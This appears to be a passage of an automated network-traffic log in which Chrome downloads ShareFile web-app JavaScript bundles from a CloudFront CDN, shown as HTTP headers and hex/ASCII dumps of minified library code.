                                                                                                                                                                                                                      2024-11-05 19:36:14 UTC2804INData Raw: 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 72 3d 74 68 69 73 26 26 74 68 69 73 2e 5f 5f 63 72 65 61 74 65 42 69 6e 64 69 6e 67 7c 7c 28 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 3f 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 2c 72 29 7b 72 3d 3d 3d 75 6e 64 65 66 69 6e 65 64 26 26 28 72 3d 6e 29 3b 76 61 72 20 69 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 74 2c 6e 29 3b 69 26 26 21 28 22 67 65 74 22 69 6e 20 69 3f 21 74 2e 5f 5f 65 73 4d 6f 64 75 6c 65 3a 69 2e 77 72 69 74 61 62 6c 65 7c 7c 69 2e 63 6f 6e 66 69 67 75 72 61 62 6c 65 29 7c 7c 28 69 3d 7b 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 5b 6e 5d 7d 7d 29
                                                                                                                                                                                                                      Data Ascii: ,t,n){"use strict";var r=this&&this.__createBinding||(Object.create?function(e,t,n,r){r===undefined&&(r=n);var i=Object.getOwnPropertyDescriptor(t,n);i&&!("get"in i?!t.__esModule:i.writable||i.configurable)||(i={enumerable:!0,get:function(){return t[n]}})


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      73192.168.2.174979313.227.219.304437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:14 UTC608OUTGET /sharefile-web/sharefiledev-user-act-hist-pilet/1.7.0/package/dist/index.js HTTP/1.1
                                                                                                                                                                                                                      Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                      Origin: https://averellharriman.sharefile.com
                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-05 19:36:15 UTC589INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Content-Type: application/x-javascript
                                                                                                                                                                                                                      Content-Length: 91744
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Last-Modified: Thu, 19 Sep 2024 10:07:36 GMT
                                                                                                                                                                                                                      x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Server: AmazonS3
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 19:36:15 GMT
                                                                                                                                                                                                                      ETag: "ec10a08abeea396244c7c88ffaa5ecf7"
                                                                                                                                                                                                                      X-Cache: RefreshHit from cloudfront
                                                                                                                                                                                                                      Via: 1.1 6642832e0f3e501fb9fdc5f35d4351d8.cloudfront.net (CloudFront)
                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS54-C1
                                                                                                                                                                                                                      X-Amz-Cf-Id: HptAnB5ewBXfOpogONNHxHdDn2TY6SvYO08Sf3FnyM1YAakQ_6CVmQ==
                                                                                                                                                                                                                      Access-Control-Allow-Origin: https://averellharriman.sharefile.com
                                                                                                                                                                                                                      Vary: Origin
                                                                                                                                                                                                                      2024-11-05 19:36:15 UTC16384INData Raw: 2f 2f 40 70 69 6c 65 74 20 76 3a 32 28 77 65 62 70 61 63 6b 43 68 75 6e 6b 70 72 5f 73 68 61 72 65 66 69 6c 65 64 65 76 75 73 65 72 61 63 74 68 69 73 74 70 69 6c 65 74 2c 7b 7d 29 0a 53 79 73 74 65 6d 2e 72 65 67 69 73 74 65 72 28 5b 22 61 6e 74 64 22 2c 22 72 65 61 63 74 22 2c 22 72 65 61 63 74 2d 64 6f 6d 22 2c 22 74 73 6c 69 62 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 72 3d 7b 7d 2c 6e 3d 7b 7d 2c 6f 3d 7b 7d 2c 69 3d 7b 7d 3b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 6e 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 2c 7b 73 65 74 74 65 72 73 3a 5b 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 2e 41 6c 65 72 74 3d 65 2e 41 6c 65 72 74 2c 72 2e 42 75 74 74 6f 6e
                                                                                                                                                                                                                      Data Ascii: //@pilet v:2(webpackChunkpr_sharefiledevuseracthistpilet,{})System.register(["antd","react","react-dom","tslib"],(function(e,t){var r={},n={},o={},i={};return Object.defineProperty(n,"__esModule",{value:!0}),{setters:[function(e){r.Alert=e.Alert,r.Button
                                                                                                                                                                                                                      2024-11-05 19:36:15 UTC16384INData Raw: 26 26 22 53 68 61 72 65 46 69 6c 65 2e 41 70 69 2e 4d 6f 64 65 6c 73 2e 57 6f 72 6b 66 6c 6f 77 42 75 6e 64 6c 65 22 3d 3d 3d 65 5b 22 6f 64 61 74 61 2e 74 79 70 65 22 5d 7d 66 75 6e 63 74 69 6f 6e 20 61 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 53 68 61 72 65 46 69 6c 65 2e 41 70 69 2e 4d 6f 64 65 6c 73 2e 45 6e 73 53 75 62 73 63 72 69 70 74 69 6f 6e 52 65 71 75 65 73 74 22 3d 3d 3d 65 5b 22 6f 64 61 74 61 2e 74 79 70 65 22 5d 7d 66 75 6e 63 74 69 6f 6e 20 75 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 53 68 61 72 65 46 69 6c 65 2e 41 70 69 2e 4d 6f 64 65 6c 73 2e 45 6e 73 53 75 62 73 63 72 69 70 74 69 6f 6e 54 6f 6b 65 6e 22 3d 3d 3d 65 5b 22 6f 64 61 74 61 2e 74 79 70 65 22 5d 7d 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 72 65 74 75 72 6e 20 65 26
                                                                                                                                                                                                                      Data Ascii: &&"ShareFile.Api.Models.WorkflowBundle"===e["odata.type"]}function a(e){return e&&"ShareFile.Api.Models.EnsSubscriptionRequest"===e["odata.type"]}function u(e){return e&&"ShareFile.Api.Models.EnsSubscriptionToken"===e["odata.type"]}function c(e){return e&
                                                                                                                                                                                                                      2024-11-05 19:36:15 UTC16384INData Raw: 63 6f 6d 70 72 65 73 73 3a 61 2c 6d 61 78 43 6f 6e 74 65 6e 74 4c 65 6e 67 74 68 3a 61 2c 6d 61 78 42 6f 64 79 4c 65 6e 67 74 68 3a 61 2c 62 65 66 6f 72 65 52 65 64 69 72 65 63 74 3a 61 2c 74 72 61 6e 73 70 6f 72 74 3a 61 2c 68 74 74 70 41 67 65 6e 74 3a 61 2c 68 74 74 70 73 41 67 65 6e 74 3a 61 2c 63 61 6e 63 65 6c 54 6f 6b 65 6e 3a 61 2c 73 6f 63 6b 65 74 50 61 74 68 3a 61 2c 72 65 73 70 6f 6e 73 65 45 6e 63 6f 64 69 6e 67 3a 61 2c 76 61 6c 69 64 61 74 65 53 74 61 74 75 73 3a 75 7d 3b 72 65 74 75 72 6e 20 6e 2e 66 6f 72 45 61 63 68 28 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 2e 63 6f 6e 63 61 74 28 4f 62 6a 65 63 74 2e 6b 65 79 73 28 74 29 29 2c 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 63 5b 65 5d 7c 7c 69 2c 6f 3d 74 28 65 29 3b 6e 2e
                                                                                                                                                                                                                      Data Ascii: compress:a,maxContentLength:a,maxBodyLength:a,beforeRedirect:a,transport:a,httpAgent:a,httpsAgent:a,cancelToken:a,socketPath:a,responseEncoding:a,validateStatus:u};return n.forEach(Object.keys(e).concat(Object.keys(t)),(function(e){var t=c[e]||i,o=t(e);n.
                                                                                                                                                                                                                      2024-11-05 19:36:15 UTC15108INData Raw: 65 74 20 6f 72 67 20 70 72 6f 20 73 63 68 20 22 2c 70 65 3a 22 20 63 6f 6d 20 65 64 75 20 67 6f 62 20 6d 69 6c 20 6e 65 74 20 6e 6f 6d 20 6f 72 67 20 73 6c 64 20 22 2c 70 68 3a 22 20 63 6f 6d 20 65 64 75 20 67 6f 76 20 69 20 6d 69 6c 20 6e 65 74 20 6e 67 6f 20 6f 72 67 20 22 2c 70 6b 3a 22 20 62 69 7a 20 63 6f 6d 20 65 64 75 20 66 61 6d 20 67 6f 62 20 67 6f 6b 20 67 6f 6e 20 67 6f 70 20 67 6f 73 20 67 6f 76 20 6e 65 74 20 6f 72 67 20 77 65 62 20 22 2c 70 6c 3a 22 20 61 72 74 20 62 69 61 6c 79 73 74 6f 6b 20 62 69 7a 20 63 6f 6d 20 65 64 75 20 67 64 61 20 67 64 61 6e 73 6b 20 67 6f 72 7a 6f 77 20 67 6f 76 20 69 6e 66 6f 20 6b 61 74 6f 77 69 63 65 20 6b 72 61 6b 6f 77 20 6c 6f 64 7a 20 6c 75 62 6c 69 6e 20 6d 69 6c 20 6e 65 74 20 6e 67 6f 20 6f 6c 73 7a 74
                                                                                                                                                                                                                      Data Ascii: et org pro sch ",pe:" com edu gob mil net nom org sld ",ph:" com edu gov i mil net ngo org ",pk:" biz com edu fam gob gok gon gop gos gov net org web ",pl:" art bialystok biz com edu gda gdansk gorzow gov info katowice krakow lodz lublin mil net ngo olszt
                                                                                                                                                                                                                      2024-11-05 19:36:15 UTC143INData Raw: 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 74 29 66 6f 72 28 73 20 69 6e 20 74 29 61 2e 63 61 6c 6c 28 74 2c 73 29 26 26 69 2e 72 65 6d 6f 76 65 51 75 65 72 79 28 65 2c 73 2c 74 5b 73 5d 29 3b 65 6c 73 65 7b 69 66 28 22 73 74 72 69 6e 67 22 21 3d 74 79 70 65 6f 66 20 74 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 55 52 49 2e 72 65 6d 6f 76 65 51 75 65 72 79 28 29 20 61 63 63 65 70 74 73 20 61 6e 20 6f 62 6a
                                                                                                                                                                                                                      Data Ascii: ect"==typeof t)for(s in t)a.call(t,s)&&i.removeQuery(e,s,t[s]);else{if("string"!=typeof t)throw new TypeError("URI.removeQuery() accepts an obj
                                                                                                                                                                                                                      2024-11-05 19:36:15 UTC16384INData Raw: 65 63 74 2c 20 73 74 72 69 6e 67 2c 20 52 65 67 45 78 70 20 61 73 20 74 68 65 20 66 69 72 73 74 20 70 61 72 61 6d 65 74 65 72 22 29 3b 72 21 3d 3d 75 6e 64 65 66 69 6e 65 64 3f 22 52 65 67 45 78 70 22 3d 3d 3d 63 28 72 29 3f 21 6c 28 65 5b 74 5d 29 26 26 72 2e 74 65 73 74 28 65 5b 74 5d 29 3f 65 5b 74 5d 3d 75 6e 64 65 66 69 6e 65 64 3a 65 5b 74 5d 3d 64 28 65 5b 74 5d 2c 72 29 3a 65 5b 74 5d 21 3d 3d 53 74 72 69 6e 67 28 72 29 7c 7c 6c 28 72 29 26 26 31 21 3d 3d 72 2e 6c 65 6e 67 74 68 3f 6c 28 65 5b 74 5d 29 26 26 28 65 5b 74 5d 3d 64 28 65 5b 74 5d 2c 72 29 29 3a 65 5b 74 5d 3d 75 6e 64 65 66 69 6e 65 64 3a 65 5b 74 5d 3d 75 6e 64 65 66 69 6e 65 64 7d 7d 2c 69 2e 68 61 73 51 75 65 72 79 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 2c 6e 29 7b 73 77 69
                                                                                                                                                                                                                      Data Ascii: ect, string, RegExp as the first parameter");r!==undefined?"RegExp"===c(r)?!l(e[t])&&r.test(e[t])?e[t]=undefined:e[t]=d(e[t],r):e[t]!==String(r)||l(r)&&1!==r.length?l(e[t])&&(e[t]=d(e[t],r)):e[t]=undefined:e[t]=undefined}},i.hasQuery=function(e,t,r,n){swi
                                                                                                                                                                                                                      2024-11-05 19:36:15 UTC10748INData Raw: 66 72 61 67 6d 65 6e 74 7c 7c 28 74 68 69 73 2e 5f 70 61 72 74 73 2e 66 72 61 67 6d 65 6e 74 3d 6e 75 6c 6c 2c 74 68 69 73 2e 62 75 69 6c 64 28 21 65 29 29 2c 74 68 69 73 7d 2c 73 2e 6e 6f 72 6d 61 6c 69 7a 65 53 65 61 72 63 68 3d 73 2e 6e 6f 72 6d 61 6c 69 7a 65 51 75 65 72 79 2c 73 2e 6e 6f 72 6d 61 6c 69 7a 65 48 61 73 68 3d 73 2e 6e 6f 72 6d 61 6c 69 7a 65 46 72 61 67 6d 65 6e 74 2c 73 2e 69 73 6f 38 38 35 39 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 69 2e 65 6e 63 6f 64 65 2c 74 3d 69 2e 64 65 63 6f 64 65 3b 69 2e 65 6e 63 6f 64 65 3d 65 73 63 61 70 65 2c 69 2e 64 65 63 6f 64 65 3d 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 3b 74 72 79 7b 74 68 69 73 2e 6e 6f 72 6d 61 6c 69 7a 65 28 29 7d 66 69 6e 61 6c 6c 79 7b 69 2e 65 6e 63
                                                                                                                                                                                                                      Data Ascii: fragment||(this._parts.fragment=null,this.build(!e)),this},s.normalizeSearch=s.normalizeQuery,s.normalizeHash=s.normalizeFragment,s.iso8859=function(){var e=i.encode,t=i.decode;i.encode=escape,i.decode=decodeURIComponent;try{this.normalize()}finally{i.enc
                                                                                                                                                                                                                      2024-11-05 19:36:15 UTC209INData Raw: 72 45 78 74 65 6e 73 69 6f 6e 28 22 75 72 6e 3a 73 66 65 78 74 73 6c 6f 74 3a 73 68 61 72 65 66 69 6c 65 2d 61 70 70 73 68 65 6c 6c 3a 75 73 65 72 2d 61 63 74 69 76 69 74 79 2d 68 69 73 74 6f 72 79 22 2c 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 74 2e 70 61 72 61 6d 73 3b 72 65 74 75 72 6e 20 65 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 6f 2c 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 7b 7d 2c 6e 2c 7b 70 69 6c 65 74 41 70 69 3a 72 7d 29 29 7d 29 29 7d 7d 29 28 29 2c 68 7d 29 28 29 29 7d 7d 7d 29 29 3b 0a 2f 2f 23 20 73 6f 75 72 63 65 4d 61 70 70 69 6e 67 55 52 4c 3d 69 6e 64 65 78 2e 6a 73 2e 6d 61 70
                                                                                                                                                                                                                      Data Ascii: rExtension("urn:sfextslot:sharefile-appshell:user-activity-history",(function(t){var n=t.params;return e.createElement(o,Object.assign({},n,{piletApi:r}))}))}})(),h})())}}}));//# sourceMappingURL=index.js.map


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      74192.168.2.174979513.224.189.1154437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:14 UTC422OUTGET /sharefile-web/sharefiledev-publisher-pilet/0.17.11/package/dist/index.js HTTP/1.1
                                                                                                                                                                                                                      Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-05 19:36:15 UTC522INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Content-Type: application/x-javascript
                                                                                                                                                                                                                      Content-Length: 188870
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Last-Modified: Mon, 26 Aug 2024 20:27:12 GMT
                                                                                                                                                                                                                      x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Server: AmazonS3
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 19:36:14 GMT
                                                                                                                                                                                                                      ETag: "3eb98fc30e286b34ae6a699333c2b13c"
                                                                                                                                                                                                                      X-Cache: Hit from cloudfront
                                                                                                                                                                                                                      Via: 1.1 cb33a7a4640adbb55df3e0d143601558.cloudfront.net (CloudFront)
                                                                                                                                                                                                                      X-Amz-Cf-Pop: FRA2-C1
                                                                                                                                                                                                                      X-Amz-Cf-Id: IMuOLGFoZtP0a6sFpBdblwf2OoQDxufaOPg2kC--Df29SmDoOkcMfA==
                                                                                                                                                                                                                      Age: 1
                                                                                                                                                                                                                      Vary: Origin
                                                                                                                                                                                                                      2024-11-05 19:36:15 UTC15862INData Raw: 2f 2f 40 70 69 6c 65 74 20 76 3a 32 28 77 65 62 70 61 63 6b 43 68 75 6e 6b 70 72 5f 73 68 61 72 65 66 69 6c 65 64 65 76 70 75 62 6c 69 73 68 65 72 70 69 6c 65 74 2c 7b 7d 29 0a 53 79 73 74 65 6d 2e 72 65 67 69 73 74 65 72 28 5b 22 72 65 61 63 74 22 2c 22 72 65 61 63 74 2d 64 6f 6d 22 2c 22 74 73 6c 69 62 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 72 3d 7b 7d 2c 6e 3d 7b 7d 2c 6f 3d 7b 7d 3b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 72 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 6e 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 2c 7b 73 65 74 74 65 72 73 3a 5b 66
                                                                                                                                                                                                                      Data Ascii: //@pilet v:2(webpackChunkpr_sharefiledevpublisherpilet,{})System.register(["react","react-dom","tslib"],(function(e,t){var r={},n={},o={};return Object.defineProperty(r,"__esModule",{value:!0}),Object.defineProperty(n,"__esModule",{value:!0}),{setters:[f
                                                                                                                                                                                                                      2024-11-05 19:36:15 UTC16384INData Raw: 20 4d 61 74 68 2e 6d 61 78 28 65 2b 28 74 7c 7c 30 29 2d 44 61 74 65 2e 6e 6f 77 28 29 2c 30 29 7d 66 75 6e 63 74 69 6f 6e 20 68 28 65 2c 74 2c 72 29 7b 72 65 74 75 72 6e 20 43 28 65 29 3f 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 74 3f 7b 2e 2e 2e 72 2c 71 75 65 72 79 4b 65 79 3a 65 2c 71 75 65 72 79 46 6e 3a 74 7d 3a 7b 2e 2e 2e 74 2c 71 75 65 72 79 4b 65 79 3a 65 7d 3a 65 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 72 29 7b 72 65 74 75 72 6e 20 43 28 65 29 3f 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 74 3f 7b 2e 2e 2e 72 2c 6d 75 74 61 74 69 6f 6e 4b 65 79 3a 65 2c 6d 75 74 61 74 69 6f 6e 46 6e 3a 74 7d 3a 7b 2e 2e 2e 74 2c 6d 75 74 61 74 69 6f 6e 4b 65 79 3a 65 7d 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f
                                                                                                                                                                                                                      Data Ascii: Math.max(e+(t||0)-Date.now(),0)}function h(e,t,r){return C(e)?"function"==typeof t?{...r,queryKey:e,queryFn:t}:{...t,queryKey:e}:e}function f(e,t,r){return C(e)?"function"==typeof t?{...r,mutationKey:e,mutationFn:t}:{...t,mutationKey:e}:"function"==typeo
                                                                                                                                                                                                                      2024-11-05 19:36:15 UTC6130INData Raw: 68 69 73 2e 63 6f 6e 66 69 67 3d 65 7c 7c 7b 7d 2c 74 68 69 73 2e 6d 75 74 61 74 69 6f 6e 73 3d 5b 5d 2c 74 68 69 73 2e 6d 75 74 61 74 69 6f 6e 49 64 3d 30 7d 62 75 69 6c 64 28 65 2c 74 2c 72 29 7b 63 6f 6e 73 74 20 6e 3d 6e 65 77 20 7a 28 7b 6d 75 74 61 74 69 6f 6e 43 61 63 68 65 3a 74 68 69 73 2c 6c 6f 67 67 65 72 3a 65 2e 67 65 74 4c 6f 67 67 65 72 28 29 2c 6d 75 74 61 74 69 6f 6e 49 64 3a 2b 2b 74 68 69 73 2e 6d 75 74 61 74 69 6f 6e 49 64 2c 6f 70 74 69 6f 6e 73 3a 65 2e 64 65 66 61 75 6c 74 4d 75 74 61 74 69 6f 6e 4f 70 74 69 6f 6e 73 28 74 29 2c 73 74 61 74 65 3a 72 2c 64 65 66 61 75 6c 74 4f 70 74 69 6f 6e 73 3a 74 2e 6d 75 74 61 74 69 6f 6e 4b 65 79 3f 65 2e 67 65 74 4d 75 74 61 74 69 6f 6e 44 65 66 61 75 6c 74 73 28 74 2e 6d 75 74 61 74 69 6f 6e
                                                                                                                                                                                                                      Data Ascii: his.config=e||{},this.mutations=[],this.mutationId=0}build(e,t,r){const n=new z({mutationCache:this,logger:e.getLogger(),mutationId:++this.mutationId,options:e.defaultMutationOptions(t),state:r,defaultOptions:t.mutationKey?e.getMutationDefaults(t.mutation
                                                                                                                                                                                                                      2024-11-05 19:36:15 UTC16384INData Raw: 52 65 66 65 74 63 68 49 6e 74 65 72 76 61 6c 29 29 7d 75 70 64 61 74 65 54 69 6d 65 72 73 28 29 7b 74 68 69 73 2e 75 70 64 61 74 65 53 74 61 6c 65 54 69 6d 65 6f 75 74 28 29 2c 74 68 69 73 2e 75 70 64 61 74 65 52 65 66 65 74 63 68 49 6e 74 65 72 76 61 6c 28 74 68 69 73 2e 63 6f 6d 70 75 74 65 52 65 66 65 74 63 68 49 6e 74 65 72 76 61 6c 28 29 29 7d 63 6c 65 61 72 53 74 61 6c 65 54 69 6d 65 6f 75 74 28 29 7b 74 68 69 73 2e 73 74 61 6c 65 54 69 6d 65 6f 75 74 49 64 26 26 28 63 6c 65 61 72 54 69 6d 65 6f 75 74 28 74 68 69 73 2e 73 74 61 6c 65 54 69 6d 65 6f 75 74 49 64 29 2c 74 68 69 73 2e 73 74 61 6c 65 54 69 6d 65 6f 75 74 49 64 3d 76 6f 69 64 20 30 29 7d 63 6c 65 61 72 52 65 66 65 74 63 68 49 6e 74 65 72 76 61 6c 28 29 7b 74 68 69 73 2e 72 65 66 65 74 63
                                                                                                                                                                                                                      Data Ascii: RefetchInterval))}updateTimers(){this.updateStaleTimeout(),this.updateRefetchInterval(this.computeRefetchInterval())}clearStaleTimeout(){this.staleTimeoutId&&(clearTimeout(this.staleTimeoutId),this.staleTimeoutId=void 0)}clearRefetchInterval(){this.refetc
                                                                                                                                                                                                                      2024-11-05 19:36:15 UTC9644INData Raw: 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 74 3f 76 6f 69 64 20 30 3a 74 2e 64 65 66 61 75 6c 74 4f 70 74 69 6f 6e 73 7d 64 65 66 61 75 6c 74 51 75 65 72 79 4f 70 74 69 6f 6e 73 28 65 29 7b 69 66 28 6e 75 6c 6c 21 3d 65 26 26 65 2e 5f 64 65 66 61 75 6c 74 65 64 29 72 65 74 75 72 6e 20 65 3b 63 6f 6e 73 74 20 74 3d 7b 2e 2e 2e 74 68 69 73 2e 64 65 66 61 75 6c 74 4f 70 74 69 6f 6e 73 2e 71 75 65 72 69 65 73 2c 2e 2e 2e 74 68 69 73 2e 67 65 74 51 75 65 72 79 44 65 66 61 75 6c 74 73 28 6e 75 6c 6c 3d 3d 65 3f 76 6f 69 64 20 30 3a 65 2e 71 75 65 72 79 4b 65 79 29 2c 2e 2e 2e 65 2c 5f 64 65 66 61 75 6c 74 65 64 3a 21 30 7d 3b 72 65 74 75 72 6e 21 74 2e 71 75 65 72 79 48 61 73 68 26 26 74 2e 71 75 65 72 79 4b 65 79 26 26 28 74 2e 71 75 65 72 79 48 61 73 68 3d 79 28
                                                                                                                                                                                                                      Data Ascii: return null==t?void 0:t.defaultOptions}defaultQueryOptions(e){if(null!=e&&e._defaulted)return e;const t={...this.defaultOptions.queries,...this.getQueryDefaults(null==e?void 0:e.queryKey),...e,_defaulted:!0};return!t.queryHash&&t.queryKey&&(t.queryHash=y(
                                                                                                                                                                                                                      2024-11-05 19:36:15 UTC16384INData Raw: 72 6e 7b 6d 65 73 73 61 67 65 3a 74 68 69 73 2e 6d 65 73 73 61 67 65 2c 6e 61 6d 65 3a 74 68 69 73 2e 6e 61 6d 65 2c 64 65 73 63 72 69 70 74 69 6f 6e 3a 74 68 69 73 2e 64 65 73 63 72 69 70 74 69 6f 6e 2c 6e 75 6d 62 65 72 3a 74 68 69 73 2e 6e 75 6d 62 65 72 2c 66 69 6c 65 4e 61 6d 65 3a 74 68 69 73 2e 66 69 6c 65 4e 61 6d 65 2c 6c 69 6e 65 4e 75 6d 62 65 72 3a 74 68 69 73 2e 6c 69 6e 65 4e 75 6d 62 65 72 2c 63 6f 6c 75 6d 6e 4e 75 6d 62 65 72 3a 74 68 69 73 2e 63 6f 6c 75 6d 6e 4e 75 6d 62 65 72 2c 73 74 61 63 6b 3a 74 68 69 73 2e 73 74 61 63 6b 2c 63 6f 6e 66 69 67 3a 74 68 69 73 2e 63 6f 6e 66 69 67 2c 63 6f 64 65 3a 74 68 69 73 2e 63 6f 64 65 2c 73 74 61 74 75 73 3a 74 68 69 73 2e 72 65 73 70 6f 6e 73 65 26 26 74 68 69 73 2e 72 65 73 70 6f 6e 73 65 2e
                                                                                                                                                                                                                      Data Ascii: rn{message:this.message,name:this.name,description:this.description,number:this.number,fileName:this.fileName,lineNumber:this.lineNumber,columnNumber:this.columnNumber,stack:this.stack,config:this.config,code:this.code,status:this.response&&this.response.
                                                                                                                                                                                                                      2024-11-05 19:36:15 UTC16384INData Raw: 22 3d 3d 3d 69 2e 74 79 70 65 29 72 65 74 75 72 6e 20 72 2e 6d 65 74 68 6f 64 3d 22 74 68 72 6f 77 22 2c 72 2e 61 72 67 3d 69 2e 61 72 67 2c 72 2e 64 65 6c 65 67 61 74 65 3d 6e 75 6c 6c 2c 76 3b 76 61 72 20 73 3d 69 2e 61 72 67 3b 72 65 74 75 72 6e 20 73 3f 73 2e 64 6f 6e 65 3f 28 72 5b 74 2e 72 65 73 75 6c 74 4e 61 6d 65 5d 3d 73 2e 76 61 6c 75 65 2c 72 2e 6e 65 78 74 3d 74 2e 6e 65 78 74 4c 6f 63 2c 22 72 65 74 75 72 6e 22 21 3d 3d 72 2e 6d 65 74 68 6f 64 26 26 28 72 2e 6d 65 74 68 6f 64 3d 22 6e 65 78 74 22 2c 72 2e 61 72 67 3d 65 29 2c 72 2e 64 65 6c 65 67 61 74 65 3d 6e 75 6c 6c 2c 76 29 3a 73 3a 28 72 2e 6d 65 74 68 6f 64 3d 22 74 68 72 6f 77 22 2c 72 2e 61 72 67 3d 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 69 74 65 72 61 74 6f 72 20 72 65 73 75
                                                                                                                                                                                                                      Data Ascii: "===i.type)return r.method="throw",r.arg=i.arg,r.delegate=null,v;var s=i.arg;return s?s.done?(r[t.resultName]=s.value,r.next=t.nextLoc,"return"!==r.method&&(r.method="next",r.arg=e),r.delegate=null,v):s:(r.method="throw",r.arg=new TypeError("iterator resu
